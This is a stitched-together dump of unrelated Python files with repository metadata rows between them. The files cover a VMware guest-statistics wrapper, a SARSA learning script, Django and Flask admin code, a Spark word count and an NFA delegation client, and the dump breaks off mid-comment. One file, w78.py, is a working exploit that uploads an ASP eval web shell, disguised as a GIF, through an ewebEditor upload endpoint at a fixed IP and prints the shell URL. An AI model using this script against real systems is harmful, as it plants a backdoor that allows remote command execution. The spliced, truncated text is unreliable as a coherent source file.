ret = vmGuestLib.VMGuestLib_GetCpuLimitMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuReservationMHz(self):
'''Retrieves the minimum processing power in MHz reserved for the virtual
machine. For information about setting a CPU reservation, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuReservationMHz(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuShares(self):
'''Retrieves the number of CPU shares allocated to the virtual machine. For
information about how an ESX server uses CPU shares to manage virtual
machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetCpuShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuStolenMs(self):
'''Retrieves the number of milliseconds that the virtual machine was in a
ready state (able to transition to a run state), but was not scheduled to run.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuStolenMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetCpuUsedMs(self):
'''Retrieves the number of milliseconds during which the virtual machine
has used the CPU. This value includes the time used by the guest
operating system and the time used by virtualization code for tasks for this
virtual machine. You can combine this value with the elapsed time
(VMGuestLib_GetElapsedMs) to estimate the effective virtual machine
CPU speed. This value is a subset of elapsedMs.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetElapsedMs(self):
'''Retrieves the number of milliseconds that have passed in the virtual
machine since it last started running on the server. The count of elapsed
time restarts each time the virtual machine is powered on, resumed, or
migrated using VMotion. This value counts milliseconds, regardless of
whether the virtual machine is using processing power during that time.
You can combine this value with the CPU time used by the virtual machine
(VMGuestLib_GetCpuUsedMs) to estimate the effective virtual machine
CPU speed. cpuUsedMs is a subset of this value.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetElapsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
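    # Worked example (a sketch): combining the two counters above, as their
    # docstrings suggest, to estimate effective VM CPU speed over an interval
    # (`lib` is an instance of this wrapper class):
    #
    #     used0, elapsed0 = lib.GetCpuUsedMs(), lib.GetElapsedMs()
    #     ...                              # wait for a sampling interval
    #     used1, elapsed1 = lib.GetCpuUsedMs(), lib.GetElapsedMs()
    #     effective_mhz = (lib.GetHostProcessorSpeed()
    #                      * (used1 - used0) / (elapsed1 - elapsed0))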
# TODO: Undocumented routine, needs testing
def GetHostCpuUsedMs(self):
'''Undocumented.'''
counter = c_uint64()
ret = vmGuestLib.VMGuestLib_GetHostCpuUsedMs(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemKernOvhdMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemKernOvhdMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemMappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysFreeMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysFreeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemPhysMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemPhysMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSharedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUnmappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUnmappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostMemUsedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetHostNumCpuCores(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostNumCpuCores(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetHostProcessorSpeed(self):
'''Retrieves the speed of the ESX system's physical CPU in MHz.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetHostProcessorSpeed(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemActiveMB(self):
        '''Retrieves the amount of memory the virtual machine is actively using -
        its estimated working set size.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemActiveMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemBalloonedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by the vSphere memory balloon driver (also referred to as the
"vmmemctl" driver).'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonMaxMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonMaxMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemBalloonTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemBalloonTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemLimitMB(self):
'''Retrieves the upper limit of memory that is available to the virtual
machine. For information about setting a memory limit, see "Limits and
Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLimitMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemLLSwappedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemLLSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemMappedMB(self):
'''Retrieves the amount of memory that is allocated to the virtual machine.
Memory that is ballooned, swapped, or has never been accessed is
excluded.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemMappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemOverheadMB(self):
'''Retrieves the amount of "overhead" memory associated with this virtual
machine that is currently consumed on the host system. Overhead
memory is additional memory that is reserved for data structures required
by the virtualization layer.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemOverheadMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemReservationMB(self):
'''Retrieves the minimum amount of memory that is reserved for the virtual
machine. For information about setting a memory reservation, see "Limits
and Reservations" on page 14.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemReservationMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedMB(self):
'''Retrieves the amount of physical memory associated with this virtual
machine that is copy-on-write (COW) shared on the host.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSharedSavedMB(self):
'''Retrieves the estimated amount of physical memory on the host saved
from copy-on-write (COW) shared guest physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSharedSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemShares(self):
'''Retrieves the number of memory shares allocated to the virtual machine.
For information about how an ESX server uses memory shares to manage
virtual machine priority, see the vSphere Resource Management Guide.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemShares(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemSwappedMB(self):
'''Retrieves the amount of memory that has been reclaimed from this virtual
machine by transparently swapping guest memory to disk.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwappedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemSwapTargetMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemSwapTargetMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemTargetSizeMB(self):
'''Retrieves the size of the target memory allocation for this virtual machine.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemTargetSizeMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
def GetMemUsedMB(self):
'''Retrieves the estimated amount of physical host memory currently
consumed for this virtual machine's physical memory.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemUsedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZippedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZippedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# TODO: Undocumented routine, needs testing
def GetMemZipSavedMB(self):
'''Undocumented.'''
counter = c_uint()
ret = vmGuestLib.VMGuestLib_GetMemZipSavedMB(self.handle.value, byref(counter))
if ret != VMGUESTLIB_ERROR_SUCCESS:
raise VMGuestLibException(ret)
return counter.value
# vim:ts=4:sw=4:et
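# Usage sketch (assumptions: the wrapper class defined above takes no
# constructor arguments here, and the code runs inside a VMware guest where
# the vmGuestLib shared library is available; `VMGuestLib` is a hypothetical
# name for that class):
#
#     lib = VMGuestLib()
#     lib.UpdateInfo()                # refresh the snapshot first
#     print(lib.GetMemActiveMB())    # then read any of the getters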
|
[
"naparuba@gmail.com"
] |
naparuba@gmail.com
|
edde0aa8cdab82be21c8ef2341f0114662f4921c
|
2d89afd5ca29fc2735a00b0440ea7d5408c8e398
|
/Crash Course/chap07/cities.py
|
ca28aba1f3091b08eb1dc268634339b862f19435
|
[] |
no_license
|
TrystanDames/Python
|
6b2c8721606e046d9ff0708569a97d7b78a0f88e
|
68b3f5f160b46fa4e876d58808ff78ac7f2d84df
|
refs/heads/main
| 2023-06-03T14:25:51.638345
| 2021-06-23T08:54:18
| 2021-06-23T08:54:18
| 357,112,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
prompt = "\nPlease enter the name of a city you have visited:"
prompt += "\n(Enter 'quit' when you are finished.) "
while True:
city = input(prompt)
if city == 'quit':
break
else:
print(f"I'd love to go to {city.title()}!")
|
[
"trystandames08@gmail.com"
] |
trystandames08@gmail.com
|
019278eb3581d9502a8dea534db2529d1d65b1bd
|
b52547e856f3dee82a332105f3b2553133c7e560
|
/ModelFreeRLPolicyLearning/policy_learning_sarsa.py
|
2c874536de7fef43e8b732237fb216c72c461639
|
[] |
no_license
|
yuhsh24/RLlearning
|
0d3410b9254527e74dc932ccf502cd8972d0bb23
|
2a49ac9ea877cae27c0ce513b795c10a2266b166
|
refs/heads/master
| 2021-01-19T05:22:23.013144
| 2016-07-21T09:48:49
| 2016-07-21T09:48:49
| 63,664,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,224
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import grid_mdp
import random
random.seed(0)
import matplotlib.pyplot as plt
grid = grid_mdp.Grid_Mdp()
states = grid.getStates()
actions = grid.getActions()
gamma = grid.getGamma()
#epsilon greedy policy#
def epsilon_greedy(qfunc, state, epsilon):
amax = 0
key = "%d_%s"%(state, actions[0])
qmax = qfunc[key]
for i in xrange(len(actions)):
key = "%d_%s"%(state, actions[i])
q = qfunc[key]
if qmax < q:
qmax = q
amax = i
#probability
pro = [0.0 for i in xrange(len(actions))]
pro[amax] += 1 - epsilon
for i in xrange(len(actions)):
pro[i] += epsilon / len(actions)
#choose
r = random.random()
s = 0.0
for i in xrange(len(actions)):
s += pro[i]
if s >= r: return actions[i]
return actions[len(actions) - 1]
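# Worked example for epsilon_greedy: with len(actions) == 4 and epsilon == 0.2,
# the greedy action is picked with probability (1 - 0.2) + 0.2/4 = 0.85 and
# each other action with 0.2/4 = 0.05; the final loop samples that
# distribution with a single uniform draw r (inverse-CDF sampling).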
best = dict()
def read_best():
f = open("best_qfunc")
for line in f:
line = line.strip()
if len(line) == 0: continue
element = line.split(":")
best[element[0]] = float(element[1])
def compute_error(qfunc):
sum1 = 0.0
for key in qfunc:
error = qfunc[key] - best[key]
sum1 += error * error
return sum1
def sarsa(num_iter1, alpha, epsilon):
x = []
y = []
qfunc = dict()
for s in states:
for a in actions:
key = "%d_%s"%(s, a)
qfunc[key] = 0.0
for iter1 in xrange(num_iter1):
x.append(iter1)
y.append(compute_error(qfunc))
s = states[int(random.random() * len(states))]
a = actions[int(random.random() * len(actions))]
t = False
count = 0
        while not t and count < 100:
key = "%d_%s"%(s,a)
t, s1, r = grid.transform(s,a)
a1 = epsilon_greedy(qfunc, s1, epsilon)
key1 = "%d_%s"%(s1,a1)
qfunc[key] = qfunc[key] + alpha * (r + gamma * qfunc[key1] - qfunc[key])
s = s1
a = a1
count += 1
plt.plot(x,y,"--",label="sarsa alpha=%2.1f epsilon=%2.1f"%(alpha,epsilon))
plt.show(True)
    return qfunc
if __name__ == "__main__":
read_best()
sarsa(1000, 0.2, 0.2)
|
[
"yhshzju@163.com"
] |
yhshzju@163.com
|
8484b482275e2ea081b24eac4c59213d8ff39e93
|
0889098368a18cc6ecfa442cfe86ed10a5ba32d6
|
/myblog/admin.py
|
300fd70c10c84a714d630170dbbed01102456364
|
[] |
no_license
|
waaaaargh/myblog
|
9932ee5606497851f9ad99b4f1da1a9a604495f6
|
95cd823ea70bdc6e835f63590dfa36da5c4e6d25
|
refs/heads/master
| 2016-09-06T09:15:29.069543
| 2015-03-24T04:16:32
| 2015-03-24T04:16:32
| 9,065,605
| 0
| 0
| null | 2013-10-30T12:22:26
| 2013-03-27T23:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 662
|
py
|
from os.path import join
from myblog import app, model, db, base_path
from flask.ext.admin import Admin
from flask.ext.admin.contrib.sqla import ModelView
from flask.ext.admin.contrib.fileadmin import FileAdmin
admin = Admin(app, name="MyBlog")
class PostView(ModelView):
form_excluded_columns = ['date', 'comments']
admin.add_view(PostView(model.post, db.session))
class CategoryView(ModelView):
form_excluded_columns = ['posts']
admin.add_view(CategoryView(model.category, db.session))
class CommentView(ModelView):
pass
admin.add_view(CommentView(model.comment, db.session))
admin.add_view(FileAdmin(join(base_path, "static"), "/static/"))
|
[
"johannes@weltraumpflege.org"
] |
johannes@weltraumpflege.org
|
c3ff962e9bc2259450ab129275683d0d23c67865
|
2411ee54802c71aa40895e827171f07289194990
|
/w78.py
|
798cb1329435e69c608c816bdb9724c582d3101e
|
[] |
no_license
|
GoodJob567/eweb-exp
|
aeaf14a715279f07307c6761110cdd2dcdff946d
|
26911dbf26563684a40646220788be04e9532fab
|
refs/heads/master
| 2023-02-16T03:28:46.829739
| 2021-01-14T11:30:21
| 2021-01-14T11:30:21
| 329,593,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 533
|
py
|
import requests
key="cmd"
requests.get("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp")
# The file to upload
f = open('shell.gif', 'w')
f.write('<%eval request("'+key+'")%>')
f.close()
f={'uploadfile':open('shell.gif','rb')}
r=requests.post("http://172.16.12.2/admin/ewebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=hack.asp",files=f).content
i=r.find(b"d('")
r=r[i+3:]
i=r.find(b"'")
print("URL: http://172.16.12.2"+r[:i].decode())
print("key is: "+key)
|
[
"52376699+GoodJob567@users.noreply.github.com"
] |
52376699+GoodJob567@users.noreply.github.com
|
248d8b61cb8796e0a111657d391f2c4e4015226f
|
bb80ddf8324408705a30e8644a2d693252cf54e9
|
/products/migrations/0001_initial.py
|
d675a60a138b0ee81ea285f6556589b60a0cadad
|
[] |
no_license
|
Code-Institute-Submissions/full_stack_stream_four_happy_box
|
483d4286b26825cf4428600b677147fd63201ff0
|
5c2fd5803bc8164d4028702b3859f5eb891d70e3
|
refs/heads/master
| 2020-03-27T19:57:01.538937
| 2018-09-01T18:37:26
| 2018-09-01T18:37:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,339
|
py
|
# Generated by Django 2.0.7 on 2018-07-11 12:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=150)),
('slug', models.SlugField(max_length=150, unique=True)),
],
options={
'verbose_name': 'category',
'ordering': ('name',),
'verbose_name_plural': 'categories',
},
),
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=20)),
('image', models.ImageField(blank=True, upload_to='images')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, default='', max_length=254)),
('slug', models.SlugField(max_length=100)),
('description', models.TextField(blank=True)),
('brand', models.CharField(default='', max_length=50)),
('price', models.DecimalField(decimal_places=2, max_digits=6)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='products.Category')),
],
options={
'ordering': ('name',),
},
),
migrations.AddField(
model_name='image',
name='product',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='product_images', to='products.Product'),
),
migrations.AlterIndexTogether(
name='product',
index_together={('id', 'slug')},
),
]
|
[
"larkineva@gmail.com"
] |
larkineva@gmail.com
|
f14053094b1246b3f7886581c70b392f158becb0
|
5b912db9e8bb7fa99d1e0932eb8a0dac7b1382f0
|
/t09_get_rid_of_it/rid.py
|
78d3728d97c74c9cb27f702750a297a07ef4ef65
|
[] |
no_license
|
AwesomeCrystalCat/py_s00
|
3df7b285855ea276736d0a01d98df2d8465ad707
|
f4814a889b49d013b8285ab15992d0a309056ea6
|
refs/heads/main
| 2023-04-05T22:23:42.637972
| 2021-04-09T10:27:13
| 2021-04-09T10:27:13
| 356,228,064
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63
|
py
|
my_number = 1
print(my_number)
del(my_number)
print(my_number)
|
[
"slavabusya@Selmarinels-MacBook-Pro.local"
] |
slavabusya@Selmarinels-MacBook-Pro.local
|
f8dab2f0e3f3dfa5c4a51b8eadc87e0c3034cb09
|
fd3436480761c48535da13752ed7681abdbd535d
|
/delegate.py
|
4131f9203dd01d50b2ff11f5c38eedbc49f49024
|
[] |
no_license
|
jayantjain100/nfa_computation_delegation
|
ea932047ec0e99ec3490e45d62e86f377596a799
|
9632d5489e6a9332474496fae4d3f82d876c1009
|
refs/heads/master
| 2020-07-24T09:10:49.844887
| 2019-12-02T05:18:01
| 2019-12-02T05:18:01
| 207,878,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,680
|
py
|
from nfa import NFA
import socket
from socket_sending import receive_object
from socket_sending import send_object
import argparse
def verify_yes_ans(given_label, final_labels):
    # True iff the label returned by the prover is one of the verifier's
    # own final-state labels
    return given_label in final_labels
parser = argparse.ArgumentParser(description='client that delegates NFA computation to prover and verifies')
parser.add_argument('--ip', metavar='ip', type=str, default='127.0.0.1',
help='the ip address of the server where the prover is running, default is localhost')
parser.add_argument('--port', metavar = 'port', type = int, default = 12345, help='port number of server to connect to, default is 12345 ')
args = parser.parse_args()
def delegate(nfas, input_string, indexes):
to_send = []
corresponding_final_labels = []
print('Creating garbled NFAs...')
for ind in indexes:
my_nfa = nfas[ind]
(gnfa, final_labels) = my_nfa.garble(input_string)
to_send.append(gnfa)
corresponding_final_labels.append(final_labels)
print('Sending garbled NFAs...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# port = 45000
s.connect((args.ip, args.port))
send_object(s, to_send)
print('Waiting to receive result from prover...')
received_ans = receive_object(s)
    print('Received the result!')
print()
final_ans = []
for ind in range(len(received_ans)):
ans = received_ans[ind]
if(not ans[0]): # no, but unsure
final_ans.append(False)
elif(ans[0] and verify_yes_ans(ans[1], corresponding_final_labels[ind])): # yes, confirmed
final_ans.append(True)
else: # wrong proof given by prover
final_ans.append(False)
return final_ans
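# Usage sketch (hypothetical values; assumes a prover process is already
# listening on args.ip:args.port and `nfas` is a list of NFA objects):
#
#     results = delegate(nfas, '0110', [0, 2])
#     # results[k] is True only when the prover answered "yes" with a
#     # final-state label that matches the verifier's own garbling.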
|
[
"ansh.sapra2233@gmail.com"
] |
ansh.sapra2233@gmail.com
|
36c64c45720f28189ea436e39cd685e6744f24e4
|
7a37bd797ea067685c887328e3b447e008e8c170
|
/resourceserver/resourceserver/urls.py
|
e551621de72683b31896faeaa5739218174e3612
|
[] |
no_license
|
Telmediq/hydrapoc
|
2e73f1b82d64d9f6b0e429e124923ede080c40a7
|
b22e0a22e97705ced2379e145c798ea2f66de25d
|
refs/heads/master
| 2020-07-14T23:32:30.147831
| 2019-09-17T21:10:04
| 2019-09-17T21:10:04
| 205,427,268
| 0
| 0
| null | 2019-12-05T00:10:34
| 2019-08-30T17:23:05
|
C#
|
UTF-8
|
Python
| false
| false
| 1,059
|
py
|
"""resourceserver URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from resourceserver import views
urlpatterns = [
path('oauth2/init', views.oauth_start, name='oauth2-init'),
path('oauth2/finish', views.oauth_finish, name='oauth2-finish'),
path('login', views.login, name='login'),
path('protected', views.protected),
path('token/<identifier>', views.view_token),
path('admin/', admin.site.urls),
]
|
[
"alex@telmediq.com"
] |
alex@telmediq.com
|
530cc38befdec212750b6f4b4eefc95536c4852c
|
39a7bc82dc6b08dc347816859eddc1ebd590138c
|
/chapter02/06-bisect.insort.py
|
a2a6b85c83d4b643e534321cd93627e1c0eebb3c
|
[] |
no_license
|
mgw2168/fluent_python
|
1a21568a70708b390e169e4126eebe76a0296d29
|
ab075e33290f75d690d455e42d3ff17f4d1e29ba
|
refs/heads/master
| 2020-07-04T22:46:12.695267
| 2019-12-05T08:05:56
| 2019-12-05T08:05:56
| 202,447,177
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 290
|
py
|
import bisect
import random
SIZE = 7
random.seed(1729)
my_list = []
# insort(seq, item) inserts item into seq while keeping seq sorted in ascending order
for i in range(SIZE):
new_item = random.randrange(SIZE*2)
bisect.insort(my_list, new_item)
print('%2d ->' % new_item, my_list)
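# Note: bisect.insort(seq, item) is equivalent to
# seq.insert(bisect.bisect(seq, item), item) - the binary search keeps the
# lookup at O(log n) comparisons, though the list insert itself is O(n).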
|
[
"mgw2168@163.com"
] |
mgw2168@163.com
|
ae970afe343d32e40e8270515b8495c93e849c6a
|
bd34847cf9e0e7c57f86c709bd0ab375b3eef682
|
/spark/word_count.py
|
3e27f4a950058d786f358811bf6c98674d325add
|
[] |
no_license
|
vshaveyko/learn_py
|
68ad17c1353859d32997989ae12de6a6ccd113da
|
2ceb5ed599ce59a611fb5ad366c9b45e2db29a82
|
refs/heads/master
| 2021-09-01T22:44:16.980240
| 2017-12-29T01:06:25
| 2017-12-29T01:06:25
| 115,279,253
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 939
|
py
|
'''Print the words and their frequencies in this file'''
import operator
import pyspark
def main():
'''Program entry point'''
    # Initialize a Spark context
with pyspark.SparkContext("local", "PySparkWordCount") as sc:
        # Get an RDD containing the lines of this script file
lines = sc.textFile(__file__)
#Split each line into words and assign a frequency of 1 to each word
words = lines.flatMap(lambda line: line.split(" ")).map(lambda word: (word, 1))
        # Count the frequency of each word
counts = words.reduceByKey(operator.add)
#Sort the counts in descending order based on the word frequency
sorted_counts = counts.sortBy(lambda x: x[1], False)
#Get an iterator over the counts to print a word and its frequency
for word,count in sorted_counts.toLocalIterator():
print(u"{} --> {}".format(word, count))
if __name__ == "__main__":
main()
|
[
"vshaveyko@gmail.com"
] |
vshaveyko@gmail.com
|
9518aed6232253576108cf492c812148ebcac253
|
90c9acae92fa0ccb63f796561aef10bb9a3a31c9
|
/python/analyze_db.py
|
37d1f04425e0e684e1da2427fa96e25906abe190
|
[] |
no_license
|
chtlp/witness-mining
|
cc94f4d3249316e15eafa354ef513815fb919326
|
f27455bfab2d9557494e507665418db67fe7b43f
|
refs/heads/master
| 2021-01-19T20:27:48.079120
| 2012-08-08T09:41:54
| 2012-08-08T09:41:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,381
|
py
|
from collections import defaultdict, OrderedDict
import csv, sqlite3, glob, sys, subprocess
from pylab import *
def analyze_columns(col_names, values):
num = len(col_names)
unique_values = [defaultdict(int) for _ in range(num)]
for row in values:
for k, c in enumerate(row):
unique_values[k][c] += 1
col_values = [None] * num
for k in range(num):
tot = sum(unique_values[k].values())
items = sorted(unique_values[k].items(), key = lambda (v, c): -c)[:10]
if sum(map(lambda (v, c): c, items)) >= 0.9 * tot:
col_values[k] = map(lambda (v, c): v, items)
return col_values
def build_count_table(col_values, col_names, values, subj):
i = col_names.index(subj)
assert col_values[i]
num = len(col_values)
count_table = [None] * num
for k in range(num):
if col_values[k]:
count_table[k] = zeros((len(col_values[k]), len(col_values[i])))
for row in values:
u = row[i]
for k, v in enumerate(row):
if col_values[k] and v in col_values[k] and u in col_values[i]:
count_table[k][ col_values[k].index(v), col_values[i].index(u) ] += 1
return count_table
def compute_entropy(count_table, col_names, subj):
ofile = open('analyze_db.log', 'w')
for k, t in enumerate(count_table):
if t is None:
continue
print 'cond_entropy( %s | %s ):\n' % (subj, col_names[k])
supp = t.sum()
ent = 0.0
m, n = t.shape
for i in range(m):
lsum = t[i,:].sum()
for j in range(n):
if t[i,j]:
ent += t[i,j] / supp * log( lsum / t[i,j] )
h_xy = 0.0
for i in range(m):
for j in range(n):
if t[i,j]:
h_xy += (t[i,j] / supp) * log(supp / t[i,j])
h_x = 0.0
for i in range(m):
s = t[i,:].sum()
if s:
h_x += (s / supp) * log(supp / s)
h_y = 0.0
for j in range(n):
s = t[:,j].sum()
if s:
h_y += (s / supp) * log(supp / s)
assert h_x <= h_xy and h_y <= h_xy,'h_x = %.3f, h_y = %.3f, h_xy = %.3f' % (h_x, h_y, h_xy)
print '\tsupport = %d, value = %.3f\n' % (supp, ent)
if not h_x:
continue
mic = (h_x + h_y - h_xy) / min(h_x, h_y)
print '\tmic = %.3f\n' % mic
ofile.write('%s\t%.3f\n' % (col_names[k], mic))
ofile.close()
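# In the notation above: for each column k, `ent` is the conditional entropy
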